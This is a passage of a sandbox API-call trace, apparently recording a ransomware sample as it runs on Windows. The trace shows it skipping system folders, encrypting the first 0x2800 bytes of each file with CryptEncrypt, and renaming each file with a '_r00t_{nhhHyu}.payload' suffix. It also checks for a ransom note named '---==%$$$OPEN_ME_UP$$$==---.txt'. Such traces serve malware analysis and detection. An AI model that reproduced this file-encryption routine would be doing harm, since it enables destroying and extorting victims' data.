GetProcessHeap () returned 0x5e0000 [0063.334] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.334] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.337] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.337] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.337] GetProcessHeap () returned 0x5e0000 [0063.337] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.337] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.337] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.337] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.337] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.337] CloseHandle (hObject=0x430) returned 1 [0063.340] GetProcessHeap () returned 0x5e0000 [0063.340] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.340] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe_r00t_{nhhHyu}.payload") returned 64 [0063.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe_r00t_{nhhhyu}.payload")) returned 1 [0063.341] GetProcessHeap () returned 0x5e0000 [0063.341] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.341] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0063.341] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Windows") returned -1 [0063.341] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="$Recycle.bin") returned 1 [0063.341] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="System Volume Information") returned -1 [0063.341] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Program Files") returned 1 [0063.341] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Program Files (x86)") returned 1 [0063.341] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 42 [0063.341] StrStrIW (lpFirst="SplashScreen.bmp", lpSrch=".payload") returned 0x0 [0063.341] lstrcmpW (lpString1="SplashScreen.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.341] lstrcmpW (lpString1="SplashScreen.bmp", lpString2="taridd") returned -1 [0063.341] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.341] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.341] GetTickCount () returned 0x11503f4 [0063.341] GetTickCount () returned 0x11503f4 [0063.341] GetTickCount () returned 0x11503f4 [0063.341] GetTickCount () returned 0x11503f4 [0063.341] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.342] GetProcessHeap () returned 0x5e0000 [0063.342] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.342] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.343] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.343] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.344] GetProcessHeap () returned 0x5e0000 [0063.344] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.344] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.344] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.344] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.344] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.344] CloseHandle (hObject=0x430) returned 1 [0063.345] GetProcessHeap () returned 0x5e0000 [0063.345] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.345] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp_r00t_{nhhHyu}.payload") returned 64 [0063.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp_r00t_{nhhhyu}.payload")) returned 1 [0063.346] GetProcessHeap () returned 0x5e0000 [0063.346] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.346] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0063.346] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Windows") returned -1 [0063.346] lstrcmpiW (lpString1="sqmapi.dll", lpString2="$Recycle.bin") returned 1 [0063.346] lstrcmpiW (lpString1="sqmapi.dll", lpString2="System Volume Information") returned -1 [0063.346] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Program Files") returned 1 [0063.346] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Program Files (x86)") returned 1 [0063.346] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll") returned 36 [0063.346] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".payload") returned 0x0 [0063.346] lstrcmpW (lpString1="sqmapi.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.346] lstrcmpW (lpString1="sqmapi.dll", lpString2="taridd") returned -1 [0063.346] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.346] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.346] GetTickCount () returned 0x11503f4 [0063.346] GetTickCount () returned 0x11503f4 [0063.346] GetTickCount () returned 0x11503f4 [0063.347] GetTickCount () returned 0x11503f4 [0063.347] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.347] GetProcessHeap () returned 0x5e0000 [0063.347] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.347] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.350] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.350] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.350] GetProcessHeap () returned 0x5e0000 [0063.350] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.350] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.350] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.351] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.351] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.351] CloseHandle (hObject=0x430) returned 1 [0063.354] GetProcessHeap () returned 0x5e0000 [0063.354] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.354] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll_r00t_{nhhHyu}.payload") returned 58 [0063.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\sqmapi.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll_r00t_{nhhhyu}.payload")) returned 1 [0063.355] GetProcessHeap () returned 0x5e0000 [0063.355] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.355] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3704, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Strings.xml", cAlternateFileName="")) returned 1 [0063.355] lstrcmpiW (lpString1="Strings.xml", lpString2="Windows") returned -1 [0063.355] lstrcmpiW (lpString1="Strings.xml", lpString2="$Recycle.bin") returned 1 [0063.355] lstrcmpiW (lpString1="Strings.xml", lpString2="System Volume Information") returned -1 [0063.355] lstrcmpiW (lpString1="Strings.xml", lpString2="Program Files") returned 1 [0063.355] lstrcmpiW (lpString1="Strings.xml", lpString2="Program Files (x86)") returned 1 [0063.355] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned 37 [0063.355] StrStrIW (lpFirst="Strings.xml", lpSrch=".payload") returned 0x0 [0063.355] lstrcmpW (lpString1="Strings.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.355] lstrcmpW (lpString1="Strings.xml", lpString2="taridd") returned -1 [0063.355] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.355] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.356] GetTickCount () returned 0x1150404 [0063.356] GetTickCount () returned 0x1150404 [0063.356] GetTickCount () returned 0x1150404 [0063.356] GetTickCount () returned 0x1150404 [0063.356] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.356] GetProcessHeap () returned 0x5e0000 [0063.356] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.356] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.358] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.358] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.358] GetProcessHeap () returned 0x5e0000 [0063.358] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.358] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.358] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.358] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.358] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.358] CloseHandle (hObject=0x430) returned 1 [0063.359] GetProcessHeap () returned 0x5e0000 [0063.359] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.359] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml_r00t_{nhhHyu}.payload") returned 59 [0063.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\strings.xml_r00t_{nhhhyu}.payload")) returned 1 [0063.360] GetProcessHeap () returned 0x5e0000 [0063.360] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.360] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0063.360] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0063.360] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0063.360] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0063.360] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0063.360] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0063.360] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned 36 [0063.360] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".payload") returned 0x0 [0063.360] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.360] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0063.360] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.360] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.360] GetTickCount () returned 0x1150404 [0063.360] GetTickCount () returned 0x1150404 [0063.360] GetTickCount () returned 0x1150404 [0063.360] GetTickCount () returned 0x1150404 [0063.360] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.360] GetProcessHeap () returned 0x5e0000 [0063.360] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.360] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.362] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.362] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.362] GetProcessHeap () returned 0x5e0000 [0063.362] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0063.362] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.362] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.363] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.363] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.363] CloseHandle (hObject=0x430) returned 1 [0063.364] GetProcessHeap () returned 0x5e0000 [0063.364] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0063.364] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml_r00t_{nhhHyu}.payload") returned 58 [0063.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml_r00t_{nhhhyu}.payload")) returned 1 [0063.365] GetProcessHeap () returned 0x5e0000 [0063.365] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0063.365] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0063.365] lstrcmpiW (lpString1="watermark.bmp", lpString2="Windows") returned -1 [0063.365] lstrcmpiW (lpString1="watermark.bmp", lpString2="$Recycle.bin") returned 1 [0063.365] lstrcmpiW (lpString1="watermark.bmp", lpString2="System Volume Information") returned 1 [0063.365] lstrcmpiW (lpString1="watermark.bmp", lpString2="Program Files") returned 1 [0063.365] lstrcmpiW (lpString1="watermark.bmp", lpString2="Program Files (x86)") returned 1 [0063.365] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp") returned 39 [0063.365] StrStrIW (lpFirst="watermark.bmp", lpSrch=".payload") returned 0x0 [0063.365] lstrcmpW (lpString1="watermark.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.365] lstrcmpW (lpString1="watermark.bmp", lpString2="taridd") returned 1 [0063.365] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0063.365] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0063.365] GetTickCount () returned 0x1150404 [0063.365] GetTickCount () returned 0x1150404 [0063.365] GetTickCount () returned 0x1150404 [0063.365] GetTickCount () returned 0x1150404 [0063.365] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0063.365] GetProcessHeap () returned 0x5e0000 [0063.365] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0063.365] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, 